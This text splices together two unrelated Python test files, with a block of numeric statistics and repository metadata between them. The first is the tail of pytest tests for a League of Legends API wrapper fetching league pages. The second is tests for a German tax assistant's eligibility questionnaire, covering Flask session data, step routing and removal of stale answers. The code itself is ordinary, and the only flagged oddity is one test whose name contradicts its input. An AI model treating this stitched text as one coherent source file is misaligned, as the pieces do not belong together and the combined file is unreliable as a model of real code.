        data = loop.run_until_complete(panth.getLeaguePosition(summonerId))
    except Exception as error:
        # Fail loudly instead of printing and hitting a NameError below.
        pytest.fail("getLeaguePosition raised: {}".format(error))
    assert isinstance(data, list)


def _fetch_league_pages(**kwargs):
    """Fetch one league page, failing the test on any exception.

    Replaces the old swallow-and-print pattern that left ``data`` unbound.
    """
    try:
        return loop.run_until_complete(panth.getLeaguePages(**kwargs))
    except Exception as error:
        pytest.fail("getLeaguePages raised: {}".format(error))


def test_league_entries():
    """The default page is solo-queue DIAMOND I entries."""
    data = _fetch_league_pages()
    assert isinstance(data, list)
    if not data:
        pytest.skip("not enough player at this rank")
    entry = data[0]
    assert entry["queueType"] == "RANKED_SOLO_5x5"
    assert entry["tier"] == "DIAMOND"
    assert entry["rank"] == "I"


def test_league_entries_params():
    """Explicit queue/tier/division parameters are reflected in the entries."""
    data = _fetch_league_pages(queue="RANKED_FLEX_SR", tier="SILVER",
                               division="III")
    assert isinstance(data, list)
    if not data:
        pytest.skip("not enough player at this rank")
    entry = data[0]
    assert entry["queueType"] == "RANKED_FLEX_SR"
    assert entry["tier"] == "SILVER"
    assert entry["rank"] == "III"


def test_league_entries_pages():
    """Consecutive pages return the same bracket but different entries."""
    data = _fetch_league_pages(queue="RANKED_FLEX_SR", tier="SILVER",
                               division="III", page=1)
    data_2 = _fetch_league_pages(queue="RANKED_FLEX_SR", tier="SILVER",
                                 division="III", page=2)
    assert isinstance(data, list)
    if not (len(data) > 0 and len(data_2) > 0):
        pytest.skip("not enough player at this rank")
    entry = data[0]
    assert entry["queueType"] == "RANKED_FLEX_SR"
    assert entry["tier"] == "SILVER"
    assert entry["rank"] == "III"
    # Page 2 must not start with the same entry as page 1.
    assert not entry == data_2[0]
| 27.753165
| 125
| 0.61756
| 547
| 4,385
| 4.780622
| 0.137112
| 0.049713
| 0.055067
| 0.091778
| 0.9174
| 0.902103
| 0.892925
| 0.868451
| 0.718547
| 0.703633
| 0
| 0.007044
| 0.255416
| 4,385
| 157
| 126
| 27.929936
| 0.793874
| 0
| 0
| 0.725664
| 0
| 0
| 0.162255
| 0
| 0
| 0
| 0
| 0
| 0.300885
| 1
| 0.097345
| false
| 0
| 0.00885
| 0
| 0.106195
| 0.106195
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
04a8004ca309a9d2180cf2f8d455c62965028f04
| 209,353
|
py
|
Python
|
webapp/tests/forms/steps/test_eligibility_steps.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 20
|
2021-07-02T07:49:08.000Z
|
2022-03-18T22:26:10.000Z
|
webapp/tests/forms/steps/test_eligibility_steps.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 555
|
2021-06-28T15:35:15.000Z
|
2022-03-31T11:51:55.000Z
|
webapp/tests/forms/steps/test_eligibility_steps.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 1
|
2021-07-04T20:34:12.000Z
|
2021-07-04T20:34:12.000Z
|
import unittest
from unittest.mock import patch, MagicMock
import pytest
from flask.sessions import SecureCookieSession
from flask_babel import ngettext, _
from pydantic import ValidationError
from werkzeug.datastructures import ImmutableMultiDict
from werkzeug.exceptions import NotFound
from app.forms.flows.eligibility_step_chooser import EligibilityStepChooser, _ELIGIBILITY_DATA_KEY
from app.forms.session_data import deserialize_session_data
from app.forms.steps.eligibility_steps import MarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep, \
MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep, \
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep, IncorrectEligibilityData, \
UserAElsterAccountEligibilityInputFormSteuerlotseStep, MarriedAlimonyEligibilityFailureDisplaySteuerlotseStep, \
UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep, PensionDecisionEligibilityInputFormSteuerlotseStep, \
DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep, \
DivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep, \
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep, SingleAlimonyEligibilityFailureDisplaySteuerlotseStep, \
SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep, PensionEligibilityFailureDisplaySteuerlotseStep, \
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep, EmploymentDecisionEligibilityInputFormSteuerlotseStep, \
TaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep, \
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep, \
TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep, \
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep, CheaperCheckEligibilityFailureDisplaySteuerlotseStep, \
MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep, \
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep, \
MarginalEmploymentIncomeEligibilityFailureDisplaySteuerlotseStep, \
IncomeOtherEligibilityFailureDisplaySteuerlotseStep, ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep, \
ForeignCountriesEligibilityFailureDisplaySteuerlotseStep, EligibilitySuccessDisplaySteuerlotseStep, \
SeparatedEligibilityInputFormSteuerlotseStep, MaritalStatusInputFormSteuerlotseStep, \
EligibilityStepMixin, SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep, \
EligibilityStartDisplaySteuerlotseStep, SeparatedJointTaxesEligibilityInputFormSteuerlotseStep, \
EligibilityMaybeDisplaySteuerlotseStep, \
data_fits_data_model_from_list, data_fits_data_model
from app.forms.steps.steuerlotse_step import RedirectSteuerlotseStep
from app.model.recursive_data import PreviousFieldsMissingError
from tests.forms.mock_steuerlotse_steps import MockRenderStep, MockStartStep, MockFormStep, MockFinalStep, \
MockDecisionEligibilityInputFormSteuerlotseStep
from tests.utils import create_session_form_data
# Baseline eligibility answers for a fully eligible single user; individual
# tests override single keys to drive specific eligibility branches.
FULL_SESSION_DATA = {'marital_status_eligibility': 'single',
                     'separated_since_last_year_eligibility': 'no',
                     'separated_lived_together_eligibility': 'no',
                     'separated_joint_taxes_eligibility': 'no',
                     'joint_taxes_eligibility': 'no',
                     'alimony_eligibility': 'no',
                     'user_a_has_elster_account_eligibility': 'no',
                     'user_b_has_elster_account_eligibility': 'no',
                     'pension_eligibility': 'yes',
                     'investment_income_eligibility': 'no',
                     'minimal_investment_income_eligibility': 'yes',
                     'taxed_investment_income_eligibility': 'no',
                     'cheaper_check_eligibility': 'no',
                     'employment_income_eligibility': 'no',
                     'marginal_employment_eligibility': 'yes',
                     'other_income_eligibility': 'no',
                     'foreign_country_eligibility': 'no'}
class TestEligibilityStepChooser(unittest.TestCase):
    """EligibilityStepChooser resolves step names to step instances."""
    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context):
        # The steps under test need an active Flask request context.
        self.req = test_request_context
    def setUp(self):
        # Replace the production step list with lightweight mock steps so the
        # chooser's resolution logic can be exercised in isolation.
        testing_steps = [MockStartStep, MockRenderStep, MockFormStep, MockFinalStep]
        testing_steps_dict = {s.name: s for s in testing_steps}
        self.endpoint_correct = "eligibility"
        self.step_chooser = EligibilityStepChooser(endpoint=self.endpoint_correct)
        self.step_chooser.steps = testing_steps_dict
        self.step_chooser.step_order = [s.name for s in testing_steps]
        self.step_chooser.first_step = next(iter(testing_steps_dict.values()))
        self.stored_data = self.step_chooser.default_data()
        # Set sessions up
        self.existing_session = "sessionAvailable"
        self.session_data = {'renten': 'yes', 'pensionen': 'yes', 'geringf': 'yes',
                             'kapitaleink': 'yes', 'other': 'no'}
    def test_if_correct_step_name_then_return_correct_step(self):
        """A known step name yields an instance of that step class."""
        response_step = self.step_chooser.get_correct_step(MockRenderStep.name, False, ImmutableMultiDict({}))
        self.assertIsInstance(response_step, MockRenderStep)
    def test_if_incorrect_step_name_then_raise_404_exception(self):
        """An unknown step name raises werkzeug's NotFound (HTTP 404)."""
        self.assertRaises(NotFound, self.step_chooser.get_correct_step, "Incorrect Step Name", False, ImmutableMultiDict({}))
    def test_if_start_step_then_return_redirect_step(self):
        """With no stored data, "start" redirects to the first real step."""
        self.step_chooser.default_data = lambda: None
        response_step = self.step_chooser.get_correct_step("start", False, ImmutableMultiDict({}))
        self.assertIsInstance(response_step, RedirectSteuerlotseStep)
        self.assertEqual(response_step.redirection_step_name, MockStartStep.name)
        self.assertEqual(response_step.endpoint, self.endpoint_correct)
class TestEligibilityStepSpecificsMixin(unittest.TestCase):
    """number_of_users derives the user count from marital/joint-tax answers."""
    def test_if_married_and_joint_taxes_false_then_return_2(self):
        # NOTE(review): despite "_false_" in the name, this test passes
        # 'joint_taxes_eligibility': 'yes' — input identical to the "_true_"
        # test below.  One of the two was probably meant to use 'no'; confirm
        # the intended fixture against number_of_users before changing it.
        input_data = {'marital_status_eligibility': 'married',
                      'separated_since_last_year_eligibility': 'no',
                      'joint_taxes_eligibility': 'yes', }
        num_of_users = EligibilityStepMixin().number_of_users(input_data)
        self.assertEqual(2, num_of_users)
    def test_if_married_and_joint_taxes_true_then_return_2(self):
        # Married with joint taxes: two users are involved in the return.
        input_data = {'marital_status_eligibility': 'married',
                      'separated_since_last_year_eligibility': 'no',
                      'joint_taxes_eligibility': 'yes', }
        num_of_users = EligibilityStepMixin().number_of_users(input_data)
        self.assertEqual(2, num_of_users)
    def test_if_data_incorrect_then_return_1(self):
        # Incomplete data falls back to a single user.
        input_data = {'marital_status_eligibility': 'widowed'}
        num_of_users = EligibilityStepMixin().number_of_users(input_data)
        self.assertEqual(1, num_of_users)
class TestDataFitsDataModel:
    """data_fits_data_model reports whether a model parses the given data."""

    def test_if_model_fails_then_return_false(self):
        # A model whose parse_obj raises ValidationError does not fit.
        model = MagicMock(parse_obj=MagicMock(side_effect=ValidationError([], None)))
        assert data_fits_data_model(model, {}) is False

    def test_if_model_does_not_fail_then_return_true(self):
        # A model whose parse_obj succeeds fits.
        model = MagicMock()
        assert data_fits_data_model(model, {}) is True
class TestDataFitsOneDataModel:
    """data_fits_data_model_from_list succeeds when any model accepts the data."""

    @staticmethod
    def _failing_model():
        # parse_obj raises ValidationError on every call.
        return MagicMock(parse_obj=MagicMock(side_effect=ValidationError([], None)))

    def test_if_all_models_fail_then_return_false(self):
        models = [self._failing_model() for _ in range(3)]
        assert data_fits_data_model_from_list(models, {}) is False

    def test_if_one_model_does_not_fail_then_return_true(self):
        models = [self._failing_model(), MagicMock(), self._failing_model()]
        assert data_fits_data_model_from_list(models, {}) is True

    def test_if_all_models_does_not_fail_then_return_true(self):
        models = [MagicMock(), MagicMock(), MagicMock()]
        assert data_fits_data_model_from_list(models, {}) is True
class TestEligibilityInputFormSteuerlotseStepIsPreviousStep(unittest.TestCase):
    """is_previous_step matches a candidate step name against next-step models."""

    def setUp(self):
        self.step = MockDecisionEligibilityInputFormSteuerlotseStep
        self.valid_data_model = MagicMock(parse_obj=MagicMock(return_value=None))
        self.invalid_data_model = MagicMock(parse_obj=MagicMock(side_effect=ValidationError([], None)))

    def _is_previous(self, models, step_name):
        # Install the (model, next-step-name) pairs on the step and query
        # is_previous_step with empty data.
        self.step.next_step_data_models = models
        return self.step.is_previous_step(step_name, {})

    def test_if_one_model_and_data_valid_for_model_then_return_true(self):
        self.assertTrue(self._is_previous(
            [(self.valid_data_model, 'next_step_model')], 'next_step_model'))

    def test_if_one_model_and_data_invalid_for_model_then_return_false(self):
        self.assertFalse(self._is_previous(
            [(self.invalid_data_model, 'next_step_model')], 'next_step_model'))

    def test_if_multiple_models_and_data_valid_for_one_model_then_return_true(self):
        self.assertTrue(self._is_previous(
            [(self.valid_data_model, 'next_step_model_1'),
             (self.invalid_data_model, 'next_step_model_2')],
            'next_step_model_1'))
        self.assertTrue(self._is_previous(
            [(self.invalid_data_model, 'next_step_model_1'),
             (self.valid_data_model, 'next_step_model_2')],
            'next_step_model_2'))

    def test_if_multiple_models_and_data_valid_for_both_models_then_return_true_for_first_model(self):
        self.assertTrue(self._is_previous(
            [(self.valid_data_model, 'next_step_model_1'),
             (self.valid_data_model, 'next_step_model_2')],
            'next_step_model_1'))

    def test_if_multiple_models_and_data_valid_for_both_models_then_return_true_for_second_model(self):
        self.assertTrue(self._is_previous(
            [(self.valid_data_model, 'next_step_model_1'),
             (self.valid_data_model, 'next_step_model_2')],
            'next_step_model_2'))

    def test_if_multiple_models_and_data_invalid_for_both_models_then_return_false(self):
        self.assertFalse(self._is_previous(
            [(self.invalid_data_model, 'next_step_model_1'),
             (self.invalid_data_model, 'next_step_model_2')],
            'next_step_model_1'))

    def test_if_multiple_models_and_data_valid_for_both_models_but_next_step_not_matching_then_return_false(self):
        self.assertFalse(self._is_previous(
            [(self.valid_data_model, 'next_step_model_1'),
             (self.valid_data_model, 'next_step_model_2')],
            'next_step_model_3'))

    def test_if_given_step_name_is_not_in_next_step_list_then_return_false(self):
        self.assertFalse(self._is_previous(
            [(self.valid_data_model, 'next_step_1'),
             (self.invalid_data_model, 'next_step_model_2')],
            'DIFFERENT_STEP'))

    def test_if_matching_model_is_not_given_next_step_name_then_return_false(self):
        self.assertFalse(self._is_previous(
            [(self.valid_data_model, 'not_actual_next_step'),
             (self.invalid_data_model, 'next_step_model_2')],
            'actual_next_step'))
class TestEligibilityStartDisplaySteuerlotseStep(unittest.TestCase):
    """Handling the start step resets only the eligibility session slot."""
    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        # Flask app fixture; each test opens its own request context from it.
        self.app = app
    def test_sets_correct_session_data_to_empty_dict(self):
        """Previously stored eligibility data is wiped to an empty dict."""
        session_data = {
            _ELIGIBILITY_DATA_KEY: create_session_form_data({'marital_status_eligibility': 'single'})
        }
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(session_data)
            step = EligibilityStepChooser('eligibility').get_correct_step(EligibilityStartDisplaySteuerlotseStep.name,
                                                                          False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual({}, deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_does_not_change_other_session_data(self):
        """Session entries under other keys survive the reset untouched."""
        other_session_key = 'OTHER_SESSION_KEY'
        other_session_data = {'Galileo': 'Figaro - magnificoo'}
        another_session_key = 'ANOTHER_SESSION_KEY'
        another_session_data = {'Scaramouch': 'Fandango'}
        session_data = {
            _ELIGIBILITY_DATA_KEY: create_session_form_data({'marital_status_eligibility': 'single'}),
            other_session_key: create_session_form_data(other_session_data),
            another_session_key: create_session_form_data(another_session_data)
        }
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(session_data)
            step = EligibilityStepChooser('eligibility').get_correct_step(EligibilityStartDisplaySteuerlotseStep.name,
                                                                          False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(other_session_data, deserialize_session_data(req.session[other_session_key]))
            self.assertEqual(another_session_data, deserialize_session_data(req.session[another_session_key]))
    def test_does_not_add_data_to_empty_session_data(self):
        """Starting from an empty session still yields an empty eligibility slot."""
        session_data = {}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(session_data)
            step = EligibilityStepChooser('eligibility').get_correct_step(EligibilityStartDisplaySteuerlotseStep.name,
                                                                          False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual({}, deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_leaves_session_data_without_correct_key_untouched(self):
        """A session lacking the eligibility key keeps its other entries intact."""
        other_session_key = 'OTHER_SESSION_KEY'
        other_session_data = {'Galileo': 'Figaro - magnificoo'}
        session_data = {
            other_session_key: create_session_form_data(other_session_data)
        }
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(session_data)
            step = EligibilityStepChooser('eligibility').get_correct_step(EligibilityStartDisplaySteuerlotseStep.name,
                                                                          False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(other_session_data, deserialize_session_data(req.session[other_session_key]))
@pytest.mark.usefixtures("test_request_context")
class TestMaritalStatusInputFormSteuerlotseStep(unittest.TestCase):
    """Routing and session-pruning tests for the marital status input step."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    @staticmethod
    def _post_step(marital_status):
        # Submitted (POST) step carrying the given marital status choice.
        return EligibilityStepChooser('eligibility').get_correct_step(
            MaritalStatusInputFormSteuerlotseStep.name, True,
            form_data=ImmutableMultiDict({'marital_status_eligibility': marital_status}))

    @staticmethod
    def _get_step():
        # Unsubmitted (GET) variant of the step with no form data.
        return EligibilityStepChooser('eligibility').get_correct_step(
            MaritalStatusInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))

    def test_if_post_and_married_then_set_next_step_correct(self):
        with self.app.test_request_context(method='POST'):
            step = self._post_step('married')
            expected_url = step.url_for_step(SeparatedEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_widowed_then_set_next_step_correct(self):
        step = self._post_step('widowed')
        expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
        step.handle()
        self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_single_then_set_next_step_correct(self):
        step = self._post_step('single')
        expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
        step.handle()
        self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_divorced_then_set_next_step_correct(self):
        step = self._post_step('divorced')
        expected_url = step.url_for_step(DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
        step.handle()
        self.assertEqual(expected_url, step.render_info.next_url)

    def test_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET'):
            step = self._get_step()
            expected_url = step.url_for_step(EligibilityStartDisplaySteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        expected_data = {'marital_status_eligibility': 'single', }
        stored_data = {**expected_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(stored_data)})
            self._get_step().handle()
            self.assertEqual(expected_data, deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        stored_data = {'marital_status_eligibility': 'single', }
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(stored_data)})
            self._get_step().handle()
            self.assertEqual(stored_data, deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        expected_data = {'marital_status_eligibility': 'single', }
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            self._get_step().handle()
            self.assertEqual(expected_data, deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestSeparatedEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Routing and session-pruning tests for the 'separated since last year' step."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def setUp(self):
        # Minimal prior session state that makes this step reachable.
        self.correct_session_data = {'marital_status_eligibility': 'married'}

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                SeparatedEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'separated_since_last_year_eligibility': 'yes'}))
            expected_url = step.url_for_step(SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                SeparatedEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'separated_since_last_year_eligibility': 'no'}))
            expected_url = step.url_for_step(MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                SeparatedEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(MaritalStatusInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)

    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        # Fix: pytest applies only autouse fixtures to unittest.TestCase methods, so the
        # previous ``@pytest.mark.usefixtures('test_request_context')`` marker here had no
        # effect. Use an explicit request context, consistent with the sibling test classes.
        with self.app.test_request_context(method='POST'), \
                patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                      MagicMock(side_effect=PreviousFieldsMissingError)):
            step = EligibilityStepChooser('eligibility').get_correct_step(
                SeparatedEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'separated_since_last_year_eligibility': 'yes'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        # Keys outside the step's data model must be pruned from the session.
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no', }
        session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                SeparatedEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no', }
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                SeparatedEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        # Only the keys relevant up to this step survive a full session payload.
        only_necessary_data = {'marital_status_eligibility': 'single',
                               'separated_since_last_year_eligibility': 'no', }
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                SeparatedEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(only_necessary_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestSeparatedLivedTogetherEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Routing and session-pruning tests for the 'separated but lived together' step."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def setUp(self):
        self.correct_session_data = {'marital_status_eligibility': 'married',
                                     'separated_since_last_year_eligibility': 'yes'}

    @staticmethod
    def _session_containing(data):
        # Session object holding serialized eligibility data under the expected key.
        return SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(data)})

    @staticmethod
    def _post_step(answer):
        return EligibilityStepChooser('eligibility').get_correct_step(
            SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name, True,
            form_data=ImmutableMultiDict({'separated_lived_together_eligibility': answer}))

    @staticmethod
    def _get_step():
        return EligibilityStepChooser('eligibility').get_correct_step(
            SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))

    def test_if_post_and_session_data_correct_and_input_data_correct_then_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = self._session_containing(self.correct_session_data)
            step = self._post_step('yes')
            expected_url = step.url_for_step(SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = self._session_containing(self.correct_session_data)
            step = self._post_step('no')
            expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(self.correct_session_data)
            step = self._get_step()
            expected_url = step.url_for_step(SeparatedEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)

    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        with self.app.test_request_context(method='POST'), \
                patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                      MagicMock(side_effect=PreviousFieldsMissingError)):
            step = self._post_step('yes')
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        expected_data = {'marital_status_eligibility': 'married',
                         'separated_since_last_year_eligibility': 'yes', }
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing({**expected_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}})
            self._get_step().handle()
            self.assertEqual(expected_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(self.correct_session_data)
            self._get_step().handle()
            self.assertEqual(self.correct_session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        expected_data = {'marital_status_eligibility': 'single',
                         'separated_since_last_year_eligibility': 'no',
                         'separated_lived_together_eligibility': 'no', }
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(FULL_SESSION_DATA)
            self._get_step().handle()
            self.assertEqual(expected_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestSeparatedJointTaxesEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Routing and session-pruning tests for the separated joint-taxes decision step."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def setUp(self):
        self.correct_session_data = {'marital_status_eligibility': 'married',
                                     'separated_since_last_year_eligibility': 'yes',
                                     'separated_lived_together_eligibility': 'yes'}

    @staticmethod
    def _session_containing(data):
        # Session object holding serialized eligibility data under the expected key.
        return SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(data)})

    @staticmethod
    def _post_step(answer):
        return EligibilityStepChooser('eligibility').get_correct_step(
            SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name, True,
            form_data=ImmutableMultiDict({'separated_joint_taxes_eligibility': answer}))

    @staticmethod
    def _get_step():
        return EligibilityStepChooser('eligibility').get_correct_step(
            SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))

    def test_if_post_and_session_data_correct_and_input_data_correct_then_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = self._session_containing(self.correct_session_data)
            step = self._post_step('yes')
            expected_url = step.url_for_step(MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = self._session_containing(self.correct_session_data)
            step = self._post_step('no')
            expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as req:
            req.session = self._session_containing(self.correct_session_data)
            step = self._get_step()
            expected_url = step.url_for_step(SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)

    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        with self.app.test_request_context(method='POST'), \
                patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                      MagicMock(side_effect=PreviousFieldsMissingError)):
            step = self._post_step('yes')
            self.assertRaises(IncorrectEligibilityData, step.handle)

